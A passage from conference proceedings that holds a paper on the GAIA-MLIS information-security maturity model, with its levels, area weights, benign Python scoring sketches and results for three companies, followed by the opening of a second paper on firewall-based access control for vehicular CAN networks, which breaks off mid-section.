This is due to the increased need to protect data, which is, in
turn, one of the most important assets for any organization
nowadays. Managing security risks is an arduous task which
requires investments in support and technology management
in order to succeed. Thus, there is great demand for a tool
which is able to demonstrate the maturity level of an
information security system, with the main objective of
identifying key strengths and weaknesses in the IT processes
utilized by an organization. The GAIA-MLIS model presented
in this article has, as its main goal, to analyze the maturity level
of an organization’s information security system and supply
the organization with key data on how it can improve. The proposed
model presents descriptions of each different level in the areas
of hardware, software, people and facilities. Its main objective
is to diagnose and aid in the improvement of any identified
weaknesses in the management of each specific area.
Keywords - Maturity Level; Information Security; IT Governance.
I. INTRODUCTION
In the business world, information is seen as one of the
most important assets within organizations. There are three
distinct types of assets which are considered most valuable:
people, facilities and information [1]. Thus, security risk
management is usually based on technology support and
investment management [2].
The risks posed by information systems are not only
complex but also difficult to quantify, since the damage can
directly impact the goals of the organization [5].
Organizations and service providers must develop
protection tools in order to avoid misappropriation of user
data. Thus, security threats such as viruses, worms, denial of
service, submission of data by third parties, among others,
cause concern for both users and service providers [3].
The Governance of Information Technology, aligned
with good information security, is vital to the organization
and service providers, since its credibility and reliability are
tested every day. In addition, assessment methods can
provide prescriptive data on how to improve the company
management, as well as define who is responsible for the
information and how it will be transmitted or maintained
[15].
In conjunction with IT (Information Technology)
governance, information security means maintaining three main
pillars: confidentiality, as information must be accessible
only to authorized persons; integrity, to ensure that
information is transmitted in its entirety; and availability, to
guarantee authorized personnel access to the information
and related resources when needed [4].
Organizations should assess their level of security maturity
through a formal model and utilize it as a parameter to
measure security risk. The GAIA Maturity Level
Information Security (GAIA-MLIS) model aims to assess the
maturity level of information security used in the evaluated
network. For the purpose of implementing improvements in
these processes, GAIA-MLIS enables companies to identify
weaknesses in security processes involving hardware, software,
human resources, facilities and information.
This article is organized as follows: Section II deals with
IT Governance and Information Security; Section III
presents the GAIA-MLIS maturity model for information security;
Section IV shows tests and results; and finally, Section V
concludes the article.
II. IT GOVERNANCE AND SECURITY OF INFORMATION
Technological infrastructure is critical to daily
operations within an organization and should be managed
with defined processes. Accordingly, IT governance should
focus on risk and resource management and strategic
alignment, to ensure that technology and information
assets serve corporate objectives, maximizing benefits
and opportunities as a means of acquiring competitive
advantage [1].
IT governance has emerged as an auxiliary tool for
managers, both in IT and other sectors of an organization, to
help them comprehend the importance of all sectors working
in alignment and, therefore more efficiently, in order to
achieve their common goal [6]. IT is a strategic sector for an
organization and it aids in revenue generation, contributing
to the development of new technologies and technical
support for other sectors. The Chief Information Officer
(CIO) must establish effective governance to improve
the performance and success of the organization, supporting
business strategies and plans of action [5].
Effective governance requires that managers set
standards and regulations for information assets.
Information security is not only restricted to minimizing
risks and failures; it also affects the reputation of the
organization, depending on how it acts on disaster recovery.
In recovery, the organization defines the value of information
and its access permissions, so that everyone involved
(customers, employees, among others) comes to rely on the
credibility of the organization [7]. Almost all organizations
have automated processes in their information systems, in
order to ensure the efficient delivery of their services [17].
It is known that security is a method to protect
information against various types of threats, ensuring
continuity of business, higher return on investment and
minimized risk. It is also the practice of ensuring the
information can only be read, heard, altered or transmitted
by people or organizations that have the right to do so. The
main goals are confidentiality, integrity and availability.
Confidentiality is the protection against theft and espionage.
Integrity is the protection against non-authorized changes.
Availability is the guarantee of automated and secure access
to information for its users [12] [18].
Information security is achieved by means of an
appropriate set of controls, which might include policies,
procedures, software and hardware, among others. All these
controls need to be established, implemented, monitored,
reviewed and improved in order to achieve the company’s
business targets. Likewise, security metrics have attracted
the attention of the community for many years. However,
the field is still lacking a formal model [16].
It is necessary that these controls are carried out in
conjunction with security metrics to measure and compare
the value of the security provided by different systems and
settings [8].
The organization should always conduct audits at
predetermined time intervals in order to ascertain whether
the control objectives, processes and procedures meet the
identified information security requirements, and whether all
objectives are maintained and implemented as expected.
Control Objectives for Information and Related Technology
(COBIT) aims to help businesses create ideal value from the
IT sector, balancing and maintaining the resources from this
area. Thus, COBIT version 5 allows organizations to manage
their resources in a holistic way, covering IT and functional
areas end-to-end and considering both internal and external
business interests [9].
For the development of a maturity-level model in
information security, COBIT serves as a helper tool. Thus,
information assets gain importance in verifying the actual
efficiency of the resources used for protection and in
obtaining a level of acceptance of what is or is not risky for
the organization, since information and its security must be
established during the governance process. The COBIT
maturity model is used as the basis for the GAIA-MLIS
maturity model.
Information, systems, processes that support the
organization, and even computer networks are important
assets to the organization's business. With a view to ensuring
greater competitiveness and visibility, the security of
information assets should be reviewed periodically to verify
whether the initial planning is being executed and whether
the initial idea does or does not comply with the reality of
the organization [7].
It is a fact that organizations often undergo various types
of threats to their systems and computer networks, which
may include espionage, malicious persons within the
enterprise and electronic fraud [11]. It is well known that
organizations should understand the need for improvements
in regards to the risks they face and what targets and plans
are in place [10].
Information security is important for any organization,
whether a public agency with a model of electronic
government (e-gov), or for a private enterprise [11].
Many systems are not designed with security in mind, and
some organizations do not have appropriate processes and
procedures. It is essential that information security
requirements are identified, analyzed and monitored,
so that, through continuous improvement, targets relating to
information and its security are met.
It is important to evaluate and establish a standard for an
enterprise's maturity level, so that both can be assessed
through questionnaires or through the construction of
baselines about characteristics related to the use of
technology. A baseline, or digital signature, has
been used, for example, for establishing standards and
profiles for network usage, as may be viewed in [21] and [22].
The standards ISO/IEC 27001:2005 and 27002:2005
aim to help IT managers and others to establish the
security requirements for information which should
be adopted. The standards serve as a guideline to develop
practices and procedures for information security and assist
in confidence-building activities focusing on inter-organizational
guidelines [19] [20].
III. MODEL OF GAIA-MLIS
Information is considered by many organizations as the
asset which causes the most concern [13]. Defined processes
help managers and employees to identify the requirements
for decision making in order to protect all assets related to
information [14].
The GAIA-MLIS maturity model aims to evaluate the
level of maturity in information security and examines five
areas, which are: Hardware, Software, Staff, Facilities and
Information. All these areas are related to information.
Through this model, organizations can verify their level of
maturity in information security, identify any deficiencies
and correct them in order to implement improvements.
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 1 shows that information has a centralizing role among all assets. Keeping information secure is one of the most difficult challenges that organizations face. Given that, many resources and processes should be measured by the GAIA-MLIS model.
Figure 1. Relationship Areas.
A. GAIA-MLIS Maturity Levels
Organizations are concerned with constant intrusions into computer systems. Information security processes should ensure that information is kept in environments with efficient security, not only in computational media but also in the physical environment, with committed employees and a series of rules and procedures laid down to protect the organization's information assets.
Since this is not always carried out by companies, and given the lack of knowledge about the importance of information, or the lack of commitment from directors down to the other employees, organizations need tools able to verify the security level of their information. Thus, the GAIA-MLIS model aims to analyze the level of maturity in information security in a particular company.
Through GAIA-MLIS, companies can verify what their weaknesses are in relation to information security and what targets they need to meet to achieve a certain level of information security. Through continuous planning, corporations can use the model to check whether goals are being met. The proposed model has five maturity levels, each describing goals and objectives that companies should achieve regarding information security with a fully managed process.
The GAIA-MLIS maturity model is based on recommendations of COBIT 5 [9] and the ISO/IEC 27001 [10] and 27002 [11] standards. The GAIA-MLIS maturity levels are described below.
Level 0, not secure: Information security processes are not defined. There are no defined responsibilities for information security policies. Employees and partners are unaware of the importance of information security, or are not trained through awareness programs on it. Employees, partners and third parties do not face disciplinary proceedings upon the discovery of an information security incident. Termination policies for employees, partners and third parties, including the return of the organization's information assets, are not applied. There is no defined security or access control process. Physical facilities are unsecured. There is no protection of equipment against external threats, whether human or environmental. There is no efficient network management to avoid or minimize loss, damage or theft of information assets. Information assets are not encrypted. There is no backup policy with copies stored in monitored, access-controlled environments protected against external threats. Inventories of assets are not identified, established or documented. There is no classification of the importance and value of information.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Level 1, minimally secure: Some information security processes are defined. There are no defined sets of responsibilities for information security. Staff and partners are unaware of the importance of information security, or are not trained through awareness programs on it. Employees, partners and third parties do not face disciplinary proceedings upon the discovery of an information security incident. Termination policies for employees, partners and third parties are applied haphazardly upon departure. There is no defined security and access control process. Physical facilities are unsecured. There is some protection of equipment against external threats, whether human or environmental. There is basic network management, without defined processes to avoid or minimize loss, theft or damage to information assets. Information assets are not encrypted. There is a backup policy, but copies are not stored in monitored, access-controlled environments protected from outside threats. Inventories of assets are not identified, established or documented. There is no classification of the importance and value of information assets.
Level 2, moderately secure: Information security processes are defined. There are few defined sets of responsibilities for information security. Staff and partners are aware of the importance of information security, but are not trained through awareness programs on it. Employees, partners and third parties do not face disciplinary proceedings when information security incidents are discovered. Termination policies for employees, partners and third parties are applied haphazardly upon departure. Some access control security measures are defined. Physical facilities are unsecured. There is some protection of equipment against external threats, whether human or environmental. There is basic network management, without defined processes to avoid or minimize loss, theft or damage to information assets. Information assets are not encrypted. There is a backup policy, but copies are stored in environments without monitoring, access control or protection against external threats. Inventories of assets are identified and established, but not documented. There is no classification of the importance and value of information assets.
Level 3, partially secure: Information security processes are defined and there are defined sets of responsibilities for information security. Staff and partners are trained through awareness programs on the importance of information security. Employees, partners and third parties face disciplinary proceedings when an information security incident is discovered. Termination policies for employees, partners and third parties are partially documented. Security and access control procedures are defined. Physical facilities are protected. There is some protection of equipment against external threats, whether human or environmental. The network is managed efficiently, with some defined processes to avoid or minimize loss, theft or damage to information assets. Information assets are encrypted. There are backup policies, and copies are stored in monitored, access-controlled environments protected against external threats. Inventories of assets are identified and established, but only partially documented. Classifications of the importance and value of information assets exist, but are only partially documented.
Level 4, fully secure: Information security processes are defined. Sets of responsibilities are defined by the information security policy. Staff and partners are trained through awareness programs on the importance of information security. Employees, partners and third parties face disciplinary proceedings when an information security incident is discovered. Termination policies for employees, partners and third parties are fully documented. Access controls are defined. Physical facilities are protected, including against external threats, both human and environmental. There is efficient network management that avoids or minimizes loss, damage or theft of information assets. Information assets are encrypted. There are backup policies, and copies are stored in monitored, access-controlled environments protected against external threats. Inventories of assets are identified, established and registered. Classifications are established, and the importance and value of information assets are fully documented.
The maturity levels are associated with the following percentages: Level 0 ranges from 0% to 35%; Level 1 from 36% to 55%; Level 2 from 56% to 75%; Level 3 from 76% to 85%; and Level 4 above 85%. The percentages were assigned as metrics of the security levels described. An empirical study was carried out to create an evaluation model for information security by analyzing the five areas (hardware, software, staff, facilities and information); the weights are an adaptation of what is suggested in the groups of ISO/IEC 27002. As observed, the levels describe the overall organizational structure an organization might have, according to its maturity in information security. It is noteworthy that, through measurements with the formal GAIA-MLIS assessment model, organizations can plan for and check the weaknesses in their security processes.
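The level thresholds above can be expressed directly in code. The following sketch is ours, not part of the GAIA-MLIS specification; the function name and the handling of fractional scores are assumptions:

```python
def maturity_level(score: float) -> int:
    """Map an overall score (a percentage, 0-100) to a GAIA-MLIS maturity level.

    Thresholds follow the paper: Level 0 up to 35%, Level 1 up to 55%,
    Level 2 up to 75%, Level 3 up to 85%, Level 4 above 85%.
    """
    if not 0.0 <= score <= 100.0:
        raise ValueError("score must be a percentage between 0 and 100")
    if score <= 35:
        return 0
    if score <= 55:
        return 1
    if score <= 75:
        return 2
    if score <= 85:
        return 3
    return 4
```

For example, an organization scoring 56% would be classified at Level 2, matching Company 3 in the tests reported below.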
The five areas (hardware, software, facilities, staff and information) in GAIA-MLIS are addressed as in the ISO/IEC 27002 standard. The areas of ISO/IEC 27002 (security policy; organizing information security; asset management; human resources security; physical and environmental security; communications and operations management; access control; information systems acquisition, development and maintenance; information security incident management; business continuity management; and compliance) can be related to the five areas of GAIA-MLIS.
The evaluation gives all companies, whether public or private, the ability to measure, manage and verify their information assets, and to use metrics to target higher levels by structuring their processes according to their needs and realities. The results obtained by combining the data from the areas thus provide greater control over the processes used in information security, as well as over the risks to which organizations are subjected every day.
IV. TESTS AND RESULTS
To verify and validate the GAIA-MLIS maturity model, three organizational structures were analyzed. The companies were not divided into sector groups (service provider, business company, etc.), because we wanted a general sample.
A questionnaire with thirty questions was administered in order to identify strengths and weaknesses in the processes of the five areas. The objective of the questions is to perform a diagnostic analysis of each area (hardware, software, staff, facilities and information). The questions were developed based on the groups suggested in ISO/IEC 27002. There are five questions for each of the hardware, software, staff and facilities areas, and ten questions related to the information area. The diagnosis evaluates security requirements related to policies and rules in the five suggested areas, assessing the degree of investment and the use of technologies to guarantee each one of them. The weights of the questions were defined empirically, and the information area has a higher number of questions than the other areas because it is the analysis focus of the model. The areas have the following assigned weights: 30% for information, 25% for hardware, 25% for software, 15% for staff and 5% for facilities. These weights are an adaptation of what is suggested in the groups of ISO/IEC 27002.
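As a rough illustration of the weighting scheme above, the sketch below combines per-area percentages into an overall score. Aggregation by simple weighted sum is our assumption, since the exact questionnaire scoring used by GAIA-MLIS is not published here:

```python
# Area weights as stated in the text: information 30%, hardware 25%,
# software 25%, staff 15%, facilities 5%.
AREA_WEIGHTS = {
    "information": 0.30,
    "hardware": 0.25,
    "software": 0.25,
    "staff": 0.15,
    "facilities": 0.05,
}

def overall_score(area_scores: dict) -> float:
    """Combine per-area scores (each a percentage, 0-100) into one
    weighted overall percentage."""
    if set(area_scores) != set(AREA_WEIGHTS):
        raise ValueError("scores must cover exactly the five GAIA-MLIS areas")
    return sum(AREA_WEIGHTS[area] * score
               for area, score in area_scores.items())
```

For instance, a company scoring 60% in information, 50% in hardware, 70% in software, 40% in staff and 20% in facilities would receive an overall score of 55%, which the thresholds above place at Level 1.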
Figure 2 below compares the results of the analysis of the different companies.
Figure 2. Results.
According to Figure 2, Companies 1 and 2 are at maturity Level 1 in information security, while Company 3 is at Level 2. The results show that the software area receives more investment than the others, and the facilities area the least. A monitored environment may inhibit harmful actions by employees or by people who do not work in the organization. However, if a company does not provide training on its rules and on the punishments applied to employees, it faces the risk of information security threats caused by internal factors.
These results indicate that there are more weaknesses than strengths in the processes of the assessed networks, leaving the companies with a level of information security that is fragile and more susceptible to certain information security situations. Companies should therefore check and improve their processes, and directors can use the GAIA-MLIS system as an analysis tool.
The system has proved efficient in indicating the level of maturity in information security under which the companies fall. Figure 3 shows the trend lines for the three companies analyzed; these lines show their current status. The results obtained in the tests thereby enable defined strategies for improving processes and also indicate where the weaknesses are.
Figure 3. Tendency.
V. CONCLUSION
We presented the GAIA-MLIS model, which aims to analyze the maturity level of information security in enterprises, observing five areas (hardware, software, staff, facilities and information) through a diagnostic evaluation. We used three enterprises as objects of analysis and could see the strengths and weaknesses in their security areas. With the results, we can evaluate the strengths and weaknesses of an enterprise in each area and determine what needs investment to improve the information security level.
The model helps organizations focus their efforts on solving specific problems in each of the areas where the diagnostic evaluation identified a problem. The questionnaire allows exact identification of the area that needs investment in order to strengthen security and, thus, improve the maturity level of the organization.
The flexibility of the analysis demonstrates that the GAIA-MLIS system is able to state clearly the needs of each evaluated area. With the obtained results, CIOs can discuss the investment needs for all evaluated areas. The CEO therefore knows that the organization must change or create new policies and targets in order to aim at a better standard for the level of information security, demonstrating to partners and customers its concern with the integrity of all company assets, mainly information.
Companies should establish policies and goals to aim for a higher level of security. The GAIA-MLIS system provides companies with metrics to identify the strengths and weaknesses of their processes. Investments in equipment and software techniques are important; however, if employees are not committed and there is no physical infrastructure able to protect the information assets, the organization will not be able to secure its network.
The proposed model achieved its objective of performing a diagnostic security evaluation, specifically of hardware, software, staff, facilities and information. It also helps organizations focus efforts on solving specific problems in each of the areas in which the diagnostic evaluation found a problem.
An advantage of the model is the simplicity and speed with which it evaluates and diagnoses security maturity levels in the proposed subareas.
The corrective actions are directed according to the result
of the diagnostic evaluation, and they aim to define policies
of investment and adjustment on the analyzed areas in order
to improve the information security.
In future work, we intend to analyze other companies separated by sector (service providers, public agencies, etc.), aiming to adjust and improve the results according to characteristics common to organizations.
The GAIA-MLIS model contributes to better management of information assets by analyzing five areas (hardware, software, staff, facilities and information), aiming to formalize metrics and levels of security. It creates value in the sense that it allows for planned investments and formal documentation, defining standards and procedures for IT processes.
ACKNOWLEDGEMENTS
This work was supported by SETI/Fundação Araucária and by MCT/CNPq through the Betelgeuse Project's financial support.
REFERENCES
[1] R. V. Solms, K. L. Thomson and P. M. Maninjwa, "Information security governance control through comprehensive policy architectures", Proc. IEEE ISSA, IEEE Press, Aug. 2011, pp. 1-6.
[2] X. Yuan, Y. Zhou and Z. Qian, "Information Security of Power Corporations and its Reinforcement Measures", Proc. IEEE CICED, IEEE Press, Sep. 2012, pp. 1-7.
[3] P. I. Wang, "Information Security Knowledge and Behavior: An Adapted Model of Technology Acceptance", Proc. IEEE ICETC, IEEE Press, June 2010, pp. v2-364 – v2-367.
[4] L. Qingguo and Z. Wei, "Strengthen Military Academy's Information Security Management", Proc. IEEE MINES, IEEE Press, Nov. 2009, pp. 182-186.
[5] J. Zhang, W. Yuan and W. Qi, "Research on Security Management and Control System of Information System in IT Governance", Proc. IEEE CSSS, IEEE Press, Jun. 2011, pp. 668-673.
[6] P. Weill and J. W. Ross, IT Governance: How Top Performers Manage IT Decision Rights for Superior Results, Boston: Harvard Business Press, 2004.
[7] M. Sajko and N. Hadjina, "Information Security Governance and How to Accomplish it", Proc. IEEE MIPRO, IEEE Press, May 2011, pp. 1516-1521.
[8] K. Sun, S. Jajodia, J. Li, Y. Cheng, W. Tang and A. Singhal, "Automatic Security Analysis Using Security Metrics", Proc. IEEE MILCOM, IEEE Press, Nov. 2011, pp. 1207-1212.
[9] ISACA, COBIT 5: A Business Framework for the Governance and Management of Enterprise IT. ISACA, 2012.
[10] ISO/IEC, Information technology – Security techniques – Information security management systems – Requirements. ISO/IEC, 1st ed., 2005.
[11] ISO/IEC, Information technology – Security techniques – Code of practice for information security management. ISO/IEC, 1st ed., 2005.
[12] M. Moyo, H. Abdullah and R. C. Nienaber, "Information Security Risk Management in Small-Scale Organisations: A Case Study of Secondary Schools Computerised Information Systems", Proc. IEEE ISSA, IEEE Press, Aug. 2013, pp. 14-16.
[13] L. Hong-li and Z. Ying-ju, "Measuring effectiveness of information security management", Proc. IEEE CNMT, IEEE Press, Jan. 2009, pp. 1-4.
[14] M. Ratchakom and N. Prompoon, "A Process Model Design and Tool Support for Information Assets Access Control using Security Patterns", Proc. IEEE JCSSE, IEEE Press, May 2011, pp. 307-312.
[15] M. Simonsson and P. Johnson, "The IT organization modeling and assessment tool: Correlating IT governance maturity with the effect of IT", Proc. IEEE HICSS, IEEE Press, Jan. 2008, pp. 1-10.
[16] L. Krautsevich, F. Martinelli and A. Yautsiukhin, "Formal Analysis of Security Metrics with Defensive Actions", Proc. IEEE UIC/ATC, IEEE Press, Dec. 2013, pp. 458-465.
[17] A. Chakraborty, A. Sengupta and C. Mazumdar, "A Formal Approach to Information Security Metrics", Proc. IEEE EAIT, IEEE Press, Dec. 2012, pp. 439-442.
[18] B. Karabey and N. Baykal, "Information Security Metric Integrating Enterprise Objectives", Proc. IEEE ICCST, IEEE Press, Oct. 2009, pp. 144-148.
[19] J. Anttila, K. Jussila, J. Kajava and I. Kamaja, "Integrating ISO/IEC 27001 and other managerial discipline standards with processes of management in organizations", Proc. IEEE ARES, IEEE Press, Aug. 2012, pp. 425-436.
[20] A. Iqbal, D. Horie, Y. Goto and J. Cheng, "A Database for Effective Utilization of ISO/IEC 27002", Proc. IEEE FCST, IEEE Press, Oct. 2009, pp. 607-612.
[21] E. Gomede, M. L. Proença Jr. and R. M. Barros, "Networks Baseline and Analytic Hierarchy Process: An Approach to Strategic Decisions", Proc. IADIS International Conference Applied Computing 2012, Madrid, 2012, pp. 34-41.
[22] M. L. Proença Jr., C. Coppelmans, M. Bottoli and L. S. Mendes, "Baseline to help with network management", in e-Business and Telecommunication Networks (ICETE 2004), Dordrecht: Springer, 2006, vol. 1, pp. 158-166.
Security of Vehicular Networks:
Static and Dynamic Control of Cyber-Physical Objects
Vladimir Muliukha, Vladimir Zaborovsky, Sergey Popov
Telematics Department, St. Petersburg Polytechnic University
Saint-Petersburg, Russia
Email: vladimir@mail.neva.ru, vlad@neva.ru, popovserge@spbstu.ru
Abstract—The modern vehicle has long ceased to be a purely mechanical device. Each year, the data-processing component of the car becomes more important. Considering the vehicle as a dynamic cyber-physical object in a non-deterministic environment, we propose to use methods of cloud-service information security to solve the problem of access control to the car's telematics network. We propose real-time control for each of these aspects, which is a complex technical challenge with static and dynamic interactions. The paper proposes a solution for implementing access control for vehicular networks. It is done by firewalls using a dynamic access approach, based on virtual connection management and an algebra of filtering rules, with a mechanism for traffic filtering in "stealth" mode. The proposed security monitor architecture makes it possible to enforce a dynamic access policy depending on a static set of firewall filtering rules and the current condition of virtual connections and the network environment.
Keywords–Security; Vehicular network; Cyber-physical objects; Dynamic access control; Virtual connections.
I. INTRODUCTION
Information systems are entering our lives ever more deeply, integrating with various purely physical systems. For example, a modern car is no longer a merely mechanical device. After adding a cyber component to all internal circuits and vehicular communications, it can be assigned to a new class: cyber-physical objects. And each year this "cyber" component of the car becomes more and more important.
In order to simplify driving, more and more systems in the car are becoming automated. Many of the remaining mechanical systems in a modern car are controlled by computer via the Controller Area Network (CAN), rather than directly by the driver. According to research, modern vehicles comprise up to 60-70 Electronic Control Units (ECUs). The ECUs serve a multitude of purposes, such as monitoring and controlling the different subsystems of a car [1][2].
Many ECUs are connected together by the CAN bus. CAN is currently the most frequently used protocol in automotive networks; other protocols designed to fit specific uses, such as Local Interconnect Network (LIN), Media Oriented Systems Transport (MOST) or FlexRay, may also be employed [1]. Such a bus and its ECUs form the telematics network and serve as the information and communication system of the modern vehicle, through which most important functions are realized: it measures the vehicle's speed and revolutions per minute, informs the driver and other systems when an accident is about to occur, and so on.
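As an illustration of how telematics data such as speed and engine RPM travel over the CAN bus, the sketch below decodes two hypothetical broadcast frames. The CAN identifiers, byte layout and scaling factors here are invented for the example; real signal layouts are manufacturer-specific:

```python
import struct

# Hypothetical CAN identifiers and scaling factors -- real layouts are
# manufacturer-specific and typically described in a proprietary database.
SPEED_ID = 0x0F1
RPM_ID = 0x0F2

def decode_frame(can_id: int, payload: bytes):
    """Decode a (hypothetical) speed or RPM broadcast frame.

    Returns a (signal_name, physical_value) pair, or ("unknown", None)
    for identifiers this decoder does not know about.
    """
    if can_id == SPEED_ID:
        # Big-endian unsigned 16-bit raw value, 0.01 km/h per bit.
        raw, = struct.unpack_from(">H", payload, 0)
        return ("speed_kmh", raw * 0.01)
    if can_id == RPM_ID:
        # Big-endian unsigned 16-bit raw value, 0.25 rpm per bit.
        raw, = struct.unpack_from(">H", payload, 0)
        return ("engine_rpm", raw * 0.25)
    return ("unknown", None)
```

A security monitor sitting on the bus would perform exactly this kind of parsing before applying any filtering decision, which is why spoofed frames with valid identifiers are a serious threat.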
The world's largest automobile manufacturers are developing further, integrating more and more software and hardware into modern vehicles to provide the owner and the driver of the car with a maximum number of different digital services, including remote ones.
Based on the joint project of the Ford Motor Company and Saint-Petersburg State Polytechnical University, we expect that in the near future all new cars will be integrated into a single information service network and will be able to communicate with other cars and external sources via USB, Bluetooth, WiFi, 3G, and Long-Term Evolution (LTE) networks.
The digital revolution allows vehicles to significantly extend their functionality, and security means have to evolve together with cars. From the 1960s to the 2010s, vehicular security devices developed from mechanical through electromechanical and electronic to software-based systems [3]. In the next few years, the car will become part of a single information and service space, a cyber-physical object operating in the information space, which will result in a new class of security threats.
For several years, experts have demonstrated vehicular information security problems by hacking the CAN network and replacing data from controllers. At the current pace of automotive research, in the near future such hacking could be done remotely. This can lead to very bad consequences, from data theft to carjacking or damage to the vehicle itself.
Thus, the information security of cars, as a new class of cyber-physical systems combining mechanical and electronic components, is one of the most important issues in vehicular networks.
This article describes cars as a new class of systems that combine a mechanical part with logical information processing, so-called cyber-physical objects. The security of information services for networks of cyber-physical objects is based on access control technology.
The paper is organized as follows. In Section II, we consider the vehicle as a cyber-physical object. In Section III, we discuss security aspects of mobile cyber-physical networks using cloud computing security approaches. Section IV contains the main aspects of dynamic access control enforcement in computer networks. In Section V, we suggest an architecture for a secure cloud computing environment. Section VI concludes the paper.
II. VEHICLES AS CYBER-PHYSICAL OBJECTS
In the near future, a new generation of vehicles will be created. Such cars will be able to receive, store, and transmit information about their surrounding environment, which will be used during their operation. Information will be transmitted between such objects, between the car and an information center, and also between the vehicle and the driver.
In our work, for the formalization of vehicular networks, we use the Cyber-Physical (CPh) approach, which extends the range of engineering and physical methods for the design of complex technical objects by researching the informational aspects of communication and interaction between objects and with the external environment.
The selection of CPh systems as a special class of designed objects is due to the necessity of integrating various components responsible for Computing, Communications, and Control (3C) processes. Although modern science offers different approaches to the use of the information aspects of physical objects, only within cybernetics have such approaches had structural engineering applications. The conceptual distinction between closed and open systems in terms of information and computational aspects requires the use of new models that take into account the characteristics of the information processes generated while driving the vehicle, which are available for monitoring, processing, and transmission via a computer network.
According to Figure 1, a CPh model of a vehicular control system can be represented as a set of components, including the following units: collection of information about the characteristics of the environment (Observation); analysis of the parameters of the current state of the controlled object via the CAN or telematics network (Orientation); decision-making according to the formal purpose of functioning (Decision); and organization and implementation of the actions required to achieve the goal (Action). The interaction of these blocks through information exchange channels allows us to consider this network structure as a universal platform. Such a platform allows us to use various approaches, including new algorithms and feedback mechanisms, to reduce the entropy of goal restrictions or the dissipation of internal processes.
Figure 1. Cyber-physical model of vehicular control system.
Network-centric solutions allow universal means of organizing information exchange to integrate different technologies for both the observed and the observable components of the control system. The main differences between observed and observable components are the "part-whole" property (for the observed components) and the "system-environment" relation (for the observable ones). The parameters and the structure of such a control system can quickly be adjusted according to current information about the internal state of the object and the characteristics of the environment, which are available in the form of digital data. These features open up new prospects for the development of intelligent vehicular cyber-physical systems, which in the near future will become an integral part of the human environment in the "Internet of Things" information space. According to the estimates in [4], network-centric cyber-objects in the global information space of the Internet will fundamentally change the social and productive components of people's lives, accelerating the accumulation of knowledge and the intellectualization of all aspects of human activity. However, this process requires not only innovative engineering ideas, but also the development of scientific concepts united by a universal scientific paradigm. Within this paradigm, for every CPh object such as a car, information should be considered a fundamental concept of objective reality, in which physical reality has a "digital" basis and is therefore computable. The idea of integrating physical concepts with the theory of computation has led to a new conceptual schema for describing nature, known as "it from bit" [5]. In this scheme, all physical objects, processes, and phenomena of nature that are available to be read and understood by a person are inherently informational and therefore isomorphic to some digital computing device. Within this paradigm, information acts as an objective attribute of matter that characterizes the fundamental distinguishability of the potential states of a real object. This distinguishability, according to Landauer's principle [6], is an energy factor of an object's states, and that is why it explains what the states are and how they are perceived by other objects. It appears when creating systems that are capable of ensuring autonomous existence during interaction with the external environment through the self-reproduction of their characteristics. It should be noted that, on the way to the widespread use of "digital reality" for control problems, there are limitations that reflect the requirement for special states of physical objects registering their changes as a result of information exchange processes. The cyber-physical approach is now often used to describe the properties of so-called non-Hamiltonian systems, in which processes of self-organization are described by the dissipative evolution of the density-state matrix. The cyber-physical methodology may also be used successfully to create complex robotic systems whose components are capable of reconfiguration as a result of transmitting and processing digital data or metadata. The control and security tasks considered in this paper cover the actual scope of the cyber-physical approach, which is the basis of cloud computing technology, and develop the methodology of cybernetics in the direction of metadata control.
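The Observation–Orientation–Decision–Action loop described above can be sketched as a simple control pass over digital data from the telematics network. The state fields, thresholds and function names below are illustrative assumptions, not taken from the paper:

```python
from dataclasses import dataclass

@dataclass
class State:
    """Simplified vehicle state as read from the telematics network."""
    speed_kmh: float
    obstacle_distance_m: float

def observe(read_sensors) -> State:
    # Observation: gather raw environment data from a sensor callback.
    return State(*read_sensors())

def orient(state: State) -> float:
    # Orientation: derive a situational parameter from the current state,
    # here the time to reach the obstacle, in seconds.
    if state.speed_kmh <= 0:
        return float("inf")
    return state.obstacle_distance_m / (state.speed_kmh / 3.6)

def decide(time_to_obstacle_s: float) -> str:
    # Decision: choose an action according to the functioning goal,
    # here collision avoidance with an assumed 2-second safety margin.
    return "brake" if time_to_obstacle_s < 2.0 else "cruise"

def act(command: str) -> str:
    # Action: hand the command to the actuator subsystem (stubbed here).
    return command

# One pass of the loop: 72 km/h with an obstacle 30 m ahead.
command = act(decide(orient(observe(lambda: (72.0, 30.0)))))
```

The point of the sketch is the feedback structure, not the numbers: each block consumes the digital output of the previous one, which is exactly the interface a security monitor must protect.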
III. SECURITY ASPECTS OF CYBER-PHYSICAL SYSTEMS
Modern technical systems have clear boundaries separating them from the environment and from other objects and systems. Therefore, the description of the processes in such systems is local, and changes of their state can be described by the laws of physics, which are, in their most general form, deterministic conservation laws, for example of energy, mass, and momentum. The mathematical formalization of these laws makes it possible to computationally determine the motion parameters of physical systems, using data on the initial conditions, the forces in the system, and the properties of the external environment. Although the classical methodology of modern physics, based on the abstraction of the "closed system", has been significantly modified by studying the mechanisms of dissipation in so-called "open systems", such an aspect of reality as information is still not used to build control models or to describe the properties of complex physical objects. In the modern world, where the influence of the Internet, supercomputers, and global information systems on all aspects of human activity has become dominant, the impact of information on physical objects cannot be ignored, for example when sustainability is realized through information exchange processes. The use of cyber-physical methods becomes especially important when studying the properties of systems known as the "Internet of Things" [6][7], in which robots, network cyber-objects, and people interact with each other by sharing data in a single information space, characterized by such concepts as "integrity", "structure", "purposeful behavior", "feedback", "balance", and "adaptability".
The scientific basis for the control of such systems has been called Data Science. The term "Big Data" describes the integration of technologies for processing digital data from the external physical or virtual environment, which are used to extract information useful for control purposes. However, realizing the potential of Data Science in robotics requires new methods for using information in control processes, based on delivering data in real time to the localization point of moving objects (the "Data in Motion" concept).
In general, "Big Data" is characterized by a combination of four main components (the four "V"s): volume, variety, velocity, and value. A further "V" is the visibility of data, which is also a key defining characteristic of Big Data.
As a result, "Big Data" in modern science has become synonymous with the complexity of system control tasks, combining the factors of physical processes that characterize the volume, velocity, variety, and value of the data they generate.
Securing CPh systems such as vehicles is a more complex task than access control in a stationary local network. Cars move, constantly changing the network configuration. Security policy enforcement requires data about permissions and prohibitions, as well as the current localization of the car and the route to it. Thus, while ensuring the information security of the vehicular network, we have to consider both static and dynamic aspects. This task is very similar to the information security of cloud services, where virtual machines regularly migrate from one physical platform to another to optimize the structure of the cloud and balance the hardware load.
